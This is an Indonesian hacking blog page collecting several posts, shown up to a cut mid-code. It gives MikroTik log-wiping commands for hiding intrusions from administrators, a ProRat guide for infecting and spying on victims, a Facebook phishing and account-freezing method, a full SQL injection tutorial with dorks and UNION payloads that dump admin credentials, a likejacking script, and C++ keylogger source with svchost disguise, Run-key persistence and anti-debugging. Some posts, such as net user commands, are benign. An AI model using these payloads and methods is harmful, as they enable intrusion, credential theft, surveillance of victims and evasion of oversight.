Cara Menghapus log atau History pada Mikrotik

Halo gan :) masih setia dengan mikrotiknya? apalagi buat yang sering akses mikrotiknya dari luar (remote) bahkan ada yang iseng nge-Hack mikrotik orang lain :p
Nah ane punya beberapa cara atau tips yang bisa membuat kegiatan atau event agan selama meng otak-atik mikrotik tersebut tidak di ketahui orang lain yang juga mengakses mikrotik tersebut . intinya sih agan lagi nge-Hack atau iseng2 belajar dan gak mau di ketahuin sama si admin nya kalo nte abis otak-atik tuh mikrotik Jadi kita bisa meghapus Log atau history pada mikrotik yang kita setting :p

Nah , Awalnya nte bisa pakai sock proxy atau tor supaya IP nte gak meninggalkan bekas di mikrotik yang nte susupin :p

Cara pakai sock proxy bisa dengan cara seperti ini :

1. Klik tools > option di Mozilla
2. klik advance
3. klik advance > setting
4. klik network
5. masukan ip dan port nya dan ok 

Nah , Langsung deh masuk ke mikrotik, dan ane anggap nte udah melakukan banyak kegiatan di mikrotik dan siap untuk logout yah, sebelum logout, silahkan ikuti cara di bawah ini untuk mengahapus recent hostory atau Log.

[admin@oprek] > system logging action

[admin@oprek] /system logging action> set memory memory-lines=1

Jangan lupa setelah di set untuk dikembalikan seperti semula, kalau tidak nanti client ngomel2 kenapa lognya cuma satu baris? hehehe. Caranya ganti  ”set memory memory-lines=1” menjadi “set memory memory-lines=100” atau terserah akan di set line berapa.

Sebelum di set :

[admin@oprek] > log print

jan/02 00:00:18 system,error,critical router rebooted without proper shutdown, probably power outage

jan/18 22:17:46 system,error,critical login failure for user admin via winbox

jan/18 22:24:36 system,info,account user admin logged in from 00:0C:42:18:F2:CB via mac-telnet

jan/19 02:15:30 system,info device changed by admin

jan/19 02:16:00 system,info,account user admin logged out from 00:04:23:BB:A2:8B via mac-telnet

10:04:51 system,info,account user admin logged in from 172.19.2.57 via winbox, dst

 

Setelah di set :

[admin@oprek] > log print

10:30:36 system,info log action changed by admin

*note : kalau yang dimaksut clear command dari terminal jawaban nya TIDAK BISA..

Semoga  membantu

Ada yang Mau Jadi DEWA dan MASTER MIKROTIK ? silahkan ke sini, semua tutorial mikrotik di rangkum dalam Bahasa INDONESIA !!

Read More

Hacking Dengan PRORAT

Assalamualaikum Sahabat CORE I7..

Kali ini saya akan membahas tentang cara hacking menggunakan PRORAT.
Tools buatan orang Turkey ini sangat luar biasa, tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban, maka kita dapat langsung menginfeksinya.

A. Cara penggunaan ProRat

1. Pertama kali kita harus mengetahui terlebih dahulu IP dan Port korban yang terbuka. Kita dapat melakukannya dengan cara manual atau juga dengan bantuan Ports Scanner.

Yang akan dijadikan korban pada percobaan kita kali ini adalah komputer dengan IP 192.162.10.233.

2. Langkah selanjutnya yaitu kita jalankan ProRat, tools ini dapat di download di disini . Sebelumnya matiin dulu Anti Virus kamu (disable), karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi komputer kita. Setelah itu isikan IP korban pada form IP dan Portnya (default 5110).

Apabila kita klik tombol Connect maka koneksi ke komputer korban belum bisa, karena komputer korban belum kita infeksi. Untuk menginfeksi komputer korban kita terlebih dahulu membuat server yang akan dijalankan pada komputer korban. Caranya klik tombol Create – Create Prorat Server. Lalu muncul tampilan Notifications :

Centang pilihan Use Proconnective Notifications dan isi IP(DNS)Address dengan IP kita. Pada tab General Setting kita isikan Server Port (default 5110), Server Password dan Victim Name.

Pada tab Bind with File kita dapat menyusupkan file yang akan dijalankan bersama Server. Extensi file bebas.

Selanjutnya adalah tab Server Extension, ada beberapa pilihan extensi server. Kita pilih yang berekstensi .Exe.

Untuk membuat icon server kita klik tab Server Icon, pilih icon apa saja yang kamu inginkan.

Langkah terakhir dari pembuatan server ini adalah klik Create Server.

Setelah berhasil, akan tampil :

3. Kita tinggal menjalankan Server tersebut dikomputer korban. Caranya terserah kamu… mau disusupkan diam-diam atau memakai teknik Social Engineering dan juga dapat kamu infeksikan langsung pada komputer tersebut (kalo bias sihh).

4. Setelah Server tersebut berhasil berjalan pada komputer korban, maka kita langsung mencoba mengkoneksikannya dengan komputer kita.

5. Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on.

6. Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected

7. Nah…saatnya kita bermain. Ada banyak hal yang dapat kita lakukan pada komputer korban seperti mengetahui informasi dari PC, mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD-ROM atau bahkan memotret wajah korban .

8. Sekarang kita akan melihat PC info korban :

Dari gambar diatas kita dapat melihat informasi yang dimiliki dari komputer korban.

9. Kita juga dapat mengirimkan pesan error palsu ke komputer korban :

10. Memasang Keylogger.

11. Dan yang paling seru adalah melihat wajah dari korban yang kita hack.

Bagaimana seru kan? Itu masih sebagian kecil dari kegunaan ProRat masih banyak lagi fungsi lainnya, seperti memformat hardisk milik korban, mengacaukan registry, mencuri data-data penting dan lain sebagainya. Akan tetapi, dalam pembahasan kita kali ini kita cukupkan sekian saja ya. Ok !

Gunakan dengan baik ya kawan.. Hanya pembelajaran..
Salam CORE I7..

Read More

Google Chrome Sebagai Mesin Hacking

Assalamualaikum wr wb sahabat CORE I7..

Disini saya akan mencoba menjelaskan dan berbagi informasi mengenai bagaimana menjadikan Google Chrome sebagai Mesin Hacking dengan “KromCAT - Google Chrome Catalog of Auditing exTensions“. Yang dibuat oleh Nabil OUCH dan informasi ini diperoleh dari vulnerability database resources.

Mungkin bagi fans google chrome sudah terbiasa memakai tool yang include didalamya yaitu “Inspect Element, Resources, Script, Dsb“.

Namun untuk menjadikan Google Chrome Sebagai Mesin Hacking yang handal, kita membutuhkan beberapa tools yang mendukung. Dimana saya menggunakan hal ini untuk melakukan audit site.

Nah, berikut adalah roadmap catalog dan plugin yang bisa digunakan agar google chrome menjadi browser yang powerfull untuk aktifitas hacking. Ada beberapa tool didalamnya mengenai “Information Gathering Tools, Application Assessment, Editors, Network Utilities, Miscellaneous, Proxies And Web Utilities, IT Security Related“.  Silakan dilihat detailnya digambar berikut:

Jika ingin melakukan aktifitas penetration testing atau audit untuk website / target. Sebaiknya siapkan peralatan di atas untuk menunjang keberhasilan aktifitas yang dilakukan.

Semoga informasi ini bermanfaat buat anda semua.

Salam CORE I7..

Read More

Cara Hack Facebook dengan Facebook freezer

Assalamualaikum Keluarga CORE I7..

Kali ini saya akan membahas tentang cara hack facebook dengan aplikasi Facebook Freezer.

1. Pertama download disini

2. Extract file Facebook freezer.zip dengan winrar atau sejenisnya...

3. Jalankan groundzero's Facebook Freezer

4. Masukan email korban

5. Klik freeze

6. Kalau sudah puas, / mau buka emailnya lagi, klik stop freeze aja. Hehehe.

Fitur:

Mari  membekukan facebook, windows live, dan account youtube.

Cara kerja:

Banyak situs memiliki fitur yang setelah jumlah xx login tidak valid (biasanya sekitar 20-25, tetapi program ini tidak 30 hanya untuk mengukur baik), account tidak aktif untuk jumlah jatah waktu (satu jam atau lebih, tergantung pada situs), atau account dinonaktifkan sampai ulang melalui email pengguna. Program ini pada dasarnya spam login (dengan login tidak valid tentu saja ...), sampai account dinonaktifkan.

Penggunaan:

Pilih situs web dari daftar drop-down (sekarang hanya ada facebook, windows live, dan youtube), masukkan email / username korban, freeze lalu tekan. Kalian akan mendengar banyak klik, yang merupakan kontrol web mengirimkan form login. The 'mari saya menonton' tkalian cek memperluas program untuk membiarkan kalian melihatnya dalam tindakan.

Semoga bermanfaat kawan.. Salam CORE I7..

Read More

Mengoprak User Melalui CMD (DOS)

Sekarang sudah jarang para pengguna computer mengenal adanya perintah yang diberikan kepada computer berupa perintah teks yang langsung dieksekusi oleh computer itu sendiri yang disebut dengan perintah DOS (DOS Command).

Misalkan saja untuk melihat isi suatu drive harddisk berupa file-file, kita harus mengetikan perintah dir supaya file-file yang ada pada drive bisa ditampilkan. Beda bukan dengan saat ini yang sudah dikenal dengan teknologi system operasi windows yang semuanya dapat dilakukan dengan mudah, yaitu hanya dengan explorer, semua file pada drive yang ditentukan dapat terlihat dengan jelas.

Diantara perintah-perintah DOS tersebut ada sebuah perintah yang juga sangat bermanfaat untuk menampilkan akun para pengguna computer serta mengganti password akun tersebut pada windows, yaitu perintah NET (huruf capital hanya mempertegas bahwa tulisan itu adalah sebuah perintah), dalam penggunaannya boleh dengan huruf besar atau kecil.

Sebagai informasi bahwa praktek mengubah password untuk user windows ini saya menggunakan windows xp service pack 2 (sp2) dan perintah ini hanya dapat dilakukan oleh seorang administrator, dengan begitu maka untuk melakukan perintah ini harus login menggunakan akun administrator sedangkan bila login menggunakan user yang lebih rendah haknya dari administrator maka perintah tersebut akan tidak berfungsi untuk mengubah password namun perintah tersebut hanya bisa digunakan untuk melihat user yang ada.

Berikut ini perintah untuk melihat dan mengubah password user yang ada pada windows xp sp2.

Pertama jalankan command prompt dengan cara klik Start-All Programs-Accessories-Command Prompt sehingga muncul jendela berwarna hitam seperti terlihat pada gambar berikut.

Pada command prompt ketikan perintah sebagai berikut : net user ENTER sehingga hasilnya seperti gambar berikut.

Dari user-user yang ada, anda bisa membuat sebuah password untuk user yang ada dan dapat juga menghapus password yang ada atau mengganti password yang ada dari setiap user yang ada.

Membuat password dan Mengubah Password

Untuk membuat password pada masing-masing user dapat dilakukan dengan memberikan perintah berikut ini.

Net user {nama user} {password}
Contoh : net user guest 1234

Penjelasannya : Net user adalah perintah, kemudian guest adalah nama user dan 1234 adalah password, jadi perintah di atas adalah membuat atau mengubah password bagi nama pengguna Guest. Perhatikan gambar berikut.

Setelah menekan ENTER maka muncul pesan “The Command Completed Successfully” yang menyatakan bahwa perintah pembuatan password untuk akun Guest sudah berhasil dengan baik. Untuk membuktikan bahwa akun Guest sudah menggunakan password 1234 coba klik menu Start-Log Off-Switch User dan gunakan akun Guest untuk login, maka windows akan meminta anda memasukan password karena anda sudah membuatnya pada command prompt. Ketik 1234 kemudian tekan ENTER untuk masuk ke akun Guest.

Setelah membuat atau mengubah password, tentu kita juga harus bisa menghapus password tersebut apabilah sudah tidak dibutuhkan lagi. Lalu bagaimana caranya ikuti langkah berikut ini.

Menghapus password

Akun Guest yang sudah dibuatkan passwordnya melalui command prompt, sekarang kita akan menghilangkannya atau menghapusnya, caranya dengan perintah berikut :
Net user guest * ENTER

Setelah menekan enter maka muncul pesan “Type a password for the user :” tekan ENTER saja karena kita tidak ingin membuat password melainkan menghapus password yang ada.
Berikutnya adalah pesan “Retype the password to confirm :” juga tekan ENTER saja karena tidak ada password sehingga muncul pesan yang terakhir “The Command Complited Successfully” yang berarti bahwa perintah menghilangkan password tersebut sudah berhasil dilakukan.

Perintah menghapus password di atas juga dapat digunakan untuk membuat sebuah password baru. Apabila hendak membuat password baru dengan perintah di atas maka pada saat muncul pesan “Type a password for the user :” maka tulis atau ketikan password untuk user tersebut (contoh : 1234) dan tekan ENTER, kemudian muncul pesan kedua “Retype the password to confirm :” maka ketiklan sekali lagi password (contoh : 1234) kemudian tekan ENTER.

Semoga bermanfaat dan salam CORE I7...

Read More

Membuat Password LAN

MEMBUAT PASSWORD LAN ( Local Area Network )

1. Pertama-tama buka [Start] lalu pilih [Run] lalu ketikkan lusrmgr.msc lalu tekan Enter

2. Kemudian Anda akan melihat window Local Users and Groups. Di window inilah kita bisa membuat password Local Area Network ( LAN).

3. Lalu pilih folder Users di sebelah kiri dan lihat ke jendela di sebelah kanan akan menampilkan daftar user yang ada.

4. Pilih Guest yang ingin kita ganti passwordnya. Klik kanan pada Guest tersebut lalu pilih Set Password…
5. Lalu akan muncul jendela peringatan megenai resiko mengganti/mereset passwordAdministrtator. KlikProceed untuk melanjutkan pekerjaan kita.
6. Isi password baru yang ingin kita pasang pada New Password dan konfirmasikan sekalilagi password baru tersebut pada Confirm Password.

Kegunaannya adalah:

1. Menghambat “Guest” untuk bisa masuk ke komputer kita melalui LAN, sehinggak ketika dia ingin masuk ke komputer kita akan diminta Password. Hal ini juga berpengaruh kepada akses login ke komputer / domain.
2. Dengan adanya ini, maka sharing folder yang ada di komputer kita bisa jauh lebih aman. Hanya ada orang-orang tertentu yang kita beri tahu passwordnya yang bisa akses.
3. Komputer kita yang ada di LAN bisa jauh lebih terjaga 

Semoga bermanfaat & selamat mencoba..

Salam CORE I7..

Read More

Cara Melihat Source Code Protected Website

Assalamualaikum sahabat CORE I7..

Kali ini saya akan membahas tentang "Cara Melihat Source Code Protected Website".  Tutorial sederhana tentang cara melihat source code web yang di proteksi oleh Anti Klik Kanan dan Anti CTRL+U, kebetulan saya menggunakan Mozilla Firefox sebagai browser.



Contohnya adalah halaman deface’annya orang, nah saya pengen tau keindahan source code orang itu, mari kita lanjutkan:



Langkahnya:

1. Klik Tools -> Web Developer -> Page Source


2. Udah kelihatan tuh source code + biang kerok anti klik kanannya!


Mudah mudahan tutorial sederhana kali ini berkenan di hati agan agan dan bermanfaat untuk pembelajaran.

Salam CORE I7..

Read More

Kumpulan Perl Script Untuk Hacking & Cracking

Assalamualaikum Wr Wb..

Share kumpulan perl script yang biasa digunakan untuk kegiatan hacking, cracking, ddos, deface, reversing, dll. Download Hacking Tools 2013, Hacking Tools 2013, Tools Hacking 2013, Cracking Tools 2013, Tools Cracking 2013, Tool Hack 2013, Tool Crack 2013, Tool Hacking 2013, Tool Cracking 2013, Tool Hacker 2013, Tool Cracker 2013, Tools Hacker 2013, Tools Cracker 2013, Pentest Tool 2013, Security Tools 2013, Password Hack 2013, yang mungkin bisa bermanfaat untuk bisa anda pakai di 2013. Happy Hacking All.

Ayo buruan download penetration testing 2013 and security tools 2013, networking tools 2013, gmail hacking tools 2013, learn ethical hacking 2013, vulnerability assessment 2013, penetration testing 2013, email hacking 2013, password hacking 2013, reverse engineering 2013. Download hacking tools, networking tools, gmail hacking, learn ethical hacking, vulnerability, penetration testing, hack email, hacking, password hacking, reverse engineering 2013, wifi hacker 2013. Hacker Tools 2013, Hack Tool 2013, Hacker Tool 2013, Hacking Tool 2013, Hack Tool 2013, Cracking Tools 2013, Cracker Tools 2013, Cracking Tool 2013, Cracker Tool 2013, Crack Tools 2013, Crack Tool 2013, Security Tool 2013, Pentester Tool 2013, Password Cracker 2013, Password Hacking 2013.

Cara Penggunaannya:

Unix (Linux) System

1. Install PERL di Unix System (biasanya secara default sudah terinstall
2. Jalankan script dengan pertintah: perl perl perlscriptfile.pl atau bisa dengan ./perlscriptfile.pl

Windows System

1. Download PERL dari Active Perl
2. Install Active PERL
3. Jalankan dengan perintah: perl perlscriptfile.pl

Download Filenya disini

Password : D3VIL

Selamat mencoba kawan.. Salam CORE I7..

Read More

Auto Like Fanspage Facebook

Assalamualaikum Wr Wb.. Salam CORE I7..

Pada postingan kali ini saya akan membagi ilmu tentang Auto Like Fanspage Facebook, 

Sebenarnya cara ini sudah lama digunakan  para blogger untuk menjaring pengunjung men-like fanspage facebook yang mereka miliki. Bagaiman cara kerja Topup Auto Like Fanspage ini? atau bagaimana cara memasang script ini pada Blog / Website anda? disini saya akan menjawab semua pertanyaan tadi sebisa yang saya miliki.

Cara Kerja Topup Auto Like Fanspage Facebook:

1. Apabila  terdapat pengunjung blog / website anda dalam kondisi login dengan facebook, dan  mereka mengklik salah satu area di blog/ website anda maka akan secara otomatis akan meng- like fanspage facebook anda.
2. Terdapat pengunjung yang dalam keadaan tidak login dengan facebook, mereka mengklik salah satu area di blog /website anda maka akan secara aotomatis keluar plugin yang menyuruh pengunjung untuk login dan akan menglike fanspage yang anda miliki (perhatikan gambar dibawah ini contoh kerja script ini).

Berikut Cara Memasang Topup Auto Like Fanspage Facebook:

Download dulu file rar nya disini

        1. Pertama Download Topup Auto Like FansPage.rar 

        2. Extrack file yang terdapat didalamnnya dan buka Topup Auto Like Fanspage.js dengan cara klik kiri pada Topup       Auto Like Fanspage.js => Open with=> Notepad.

        3. Sesudah itu ganti pada bagian “URL FANSPAGE ANDA” tanpa tanda petik dengan url fanspage yang anda miliki.

        4.Upload file Topup Auto Like Fanspage.js ke domain anda.

        5. Untuk menjalankan Topup Auto Like Fanspage ini dengan cara menambahkan script dibawah ini pada blog/website anda.<script type=”text/javascript” src=”http://DOMAINANDA/Topup Auto Like Fanspage.js”></script>

Perhatikan gambar dibawah ini :

6. Selesai deh, sangat sederhana., mudah dan gampang kan.

Selamat mencoba kawan.. Salam CORE I7

Read More

Membuat IDS Twitter Sendiri

 Assalamualaikum Wr.Wb Keluarga CORE I7,,

Kini saya akan memposting “Cara Membuat IDS Twitter Sendirii”. Pada biasanya cara ini digunakan oleh mereka yang memposting tentang Auto Followers Twitter yang menggunakan IDS/ akun Twitter kloningan alias akun kosong. Disini saya akan mengungkap bagaimana cara membuat IDS twitter tersebut dengan mudah dan cepat berikut cara-caranya :

1. Saya sarankan anda menggunakan Browser Google Chrome untuk melakukan cara ini, karena saya nilai untuk membuat akun twitter dengan browser ini relatif lebih cepat dari pada browser-browser lainnya.

2. Buka situs https://mobile.twitter.com/signup

3. Berikut bagian-bagian kolom yang perlu diisi:

•  Pada bagian Nama Lengkap : Diisikan dengan nama lengkap yang anda inginkan asal juga tidak apa-apa
•  Pada Nomor Telepon/ Alamat Email : Diisikan dengan alamat email anda. “Agar Membuat Account Twitter ini lebih cepat saya member Tips&Trick dengan memasukan alamat email asal saja missal : corei7@yahoo.com”
• Pada kata sandi : Diikan dengan kata sandi yang anda inginkan saya sarankan anda membuat kata sandi yang gampang dan mudah diingat agar proses pembuatan akun twitter ini akan lebih cepat

4.  Klik Daftar Ke Twitter

5.  Agar proses pendaftaran lebih cepat pada saat proses loading untuk membuat akun twitter tekan tombol ESC untuk memberhentikan proses loading dan kembali menekan tombol Enter untuk melanjutkan proses loading.

6. Klik pada Icon Profil / Saya

7. Lalu Scrooll kebawah pilih Sign Out/ Keluar

8. Untuk membuat akun twitter lagi ulangi cara tersebut sampai berulang-ulang kali.

9. Selesai gampang kan sekarang anda tidak perlu lagi menunggu dan menulusuri  ke blog-blog hanya untuk mendapatkan IDS Twitter tapi sekarang anda sudah bisa membuatnya.

Selamat mencoba kawan.. Salam CORE I7

Read More

Hacking Facebook Dengan Forgot Password

Banyak cara untuk mencuri username/email dan password untuk login account facebook. Diantaranya dengan cara berikut ;

1. Buat email palsu dengan domain yang meyakinkan dan bukan gratisan seperti yahoomail dan googlemail. (Contoh nyata ; ****@backd00red.org)
2. Cari email target, kita dapat mencari daftar email melaui banyak cara, dan yang paling amatir adalah lewat google atau untuk percobaan, pakai saja email teman kamu.
3. Setelah mendapatkan email yang terdaftar di facebook, buka halaman login facebook.
4. Pilih link forget password, reset password, atau change email address, atau yang sejenis.
5. Kirimkan pada email target. Usahakan email tersebut mirip dan disertai dengan signature / tertanda team facebook. Contohnya :
   
   Screenshot email di atas adalah contoh nyata yang pernah berhasil menipu seseorang pemilik alamat blog wilson-the prayer.  Silahkan baca pengalaman pak wilson dengan facebook nya tersebut.
6. Lanjut, Email di atas menawarkan konfirmasi asosiasi (hubungan) account dengan email yang kita miliki. Jika target menerima dan mengikuti link yang kita berikan di atas. Maka password lama atau baru akan dikirim ke email kita, bukan lagi pada email si pemilik asli alias target.
7. Done. Kita mendapatkan passwordnya.

Selamat Mencoba..
Salam Core I7

Read More

SQL Injection Tutorial

SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.

Untuk Mencari Inject

Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks

Code:

inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:read.php?id= "id=" & intext:"Warning: mysql_fetch_assoc() "id=" & intext:"Warning: mysql_fetch_array() "id=" & intext:"Warning: mysql_num_rows() Lebih lengkap, silakan dicari di Google Dorknya

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini

Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL

contoh

Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR

Mendapatkan Jumlah Kolom

Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.

Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw 

Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.

Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:

Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.

Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.

URL nya adalah sebagai berikut:

Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database, berikut contohnya:

Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.

Hal ini biasanya bekerja pada versi database 5.* keatas.

Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version”
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:

Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata”

Jadi URL nya akan menjadi seperti ini:

Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.

Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.

Urlnya akan tampak seperti berikut:

Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.

Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:

Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.

Misalkan nama colom seperti berikut:

admin_username
admin_password

Mengambil Informasi Database

Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:

Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinta. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.

Sebagai contoh:

Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username & database

Read More

Source Code Keylogger Menggunakan C++

Apa itu keylogger?
Mungkin dibeberapa artikel disini telah dibahas apa itu keylogger,namun untuk lebih jelasnya,saya coba jelaskan sekali lagi ya =)

Keylogger atau Perekam Ketikan merupakan sebuah perangkat baik itu perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol papan ketik [keyboard]. Sebuah perekam ketikan atau keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol papan ketik tersebut ke dalam sebuah berkas catatan (log file). Beberapa perekam ketikan tertentu bahkan dapat mengirimkan hasil rekamannya ke surel [e-mail] tertentu secara berkala.
Keylogger dapat digunakan untuk kepentingan yang baik atau bahkan bisa digunakan untuk kepentingan yang jahat. Kepentingan yang baik antara lain untuk memantau produktivitas karyawan, untuk penegakan hukum dan pencarian bukti kejahatan. Kepentingan yang buruk antara lain pencurian data dan password. (wikipedia)

Beberapa kelebihan keylogger pada artikel ini?

1. Keylogger berbasis API,full written in C++,mudah dikembangkan.
2. Size keylogger yang relatif kecil, hanya 20-30 KB tanpa dikompresi.
3. Mempunyai fitur self copy,auto startup,memonitoring proses yang aktif dan mengakhiri proses yang dapat membahayakan keylogger
4. Tidak mempunyai GUI, sehingga tidak tampak di Tab App pada task manager
5. No dependency, tidak usah membawa “beban” seperti keylogger yang dibuat dengan VB classic
6. Silahkan ditambah sendiri 

PROJECT KEYLOGGER

Mari kita mulai,pertama download Project Keylogger disini

Oke, setelah anda download, bisa anda coba atau me-rebuild ulang projek tersebut. Saya asumsikan keylogger sudah berfungsi dan anda memahaminya, LOG file yang dibuat tidak serapih LOG file keylogger master MrHpx, sehingga anda bisa memodifikasi lagi sesuai keinginan anda.

Lanjut ke tahap pembuatan fungsi lainnya untuk membuat keylogger yang lebih powerfull

AutoStartup dan Self Copy
Untuk menambahkan fungsi autostartup,kita menggunakan fungsi sebagai berikut untuk mengakses dan menulis key pada registry:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

//registry char myname[500],tmpdir[500]; HKEY hKey; DWORD dwFlags; //======================== extern int __argc; extern char **__argv; ATOM MyRegisterClass(HINSTANCE hInstance); LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); __declspec(dllexport) LRESULT CALLBACK KeyEvent (int pHookCode, WPARAM pParamW, LPARAM pParamL); //EP section //registry function void RegWriteString(HKEY hKey, LPCTSTR lpSubKey, LPCTSTR lpValueName, LPCTSTR lpData) {     int ret = 0;     HKEY phkResult = (HKEY)malloc(255);     ret = RegCreateKey(hKey, lpSubKey, &phkResult);     ret = RegSetValueEx(phkResult, lpValueName, 0, REG_SZ, (BYTE*)lpData, strlen(lpData));     RegCloseKey(hKey);     return; }

Contoh Penggunaan AutoStartup:
Mendapatkan path asli dari keylogger, kemudian mencopy dirinya sendiri ke direktori windows dengan namasvchost kemudian membuat key untuk auto startup:

1 2 3 4 5 6 7 8 9

//create startup and copying files char szCurrent[MAX_PATH]; char szPath[MAX_PATH]; GetModuleFileName(NULL,szCurrent, MAX_PATH-1); GetWindowsDirectory(szPath, sizeof(szPath)); strcat(szPath, "\\"); strcat(szPath,"svchost.exe"); CopyFile(szCurrent, szPath, true); RegWriteString(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\Currentversion\\Run", "svchost system", szPath);

Anti Debug

1 2 3

// Jika didebug, maka akan keluar if(IsDebuggerPresent() == TRUE)         ExitProcess(0);

Monitoring proses aktif dan melakukan aksi kill proses yang dianggap membahayakan keylogger

Preprocessor

1	#include tlhelp32.h

Deklarasi Variabel

1 2	DWORD WINAPI terminator(LPVOID Param); DWORD id = 0;

Fungsi Proses Killer:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

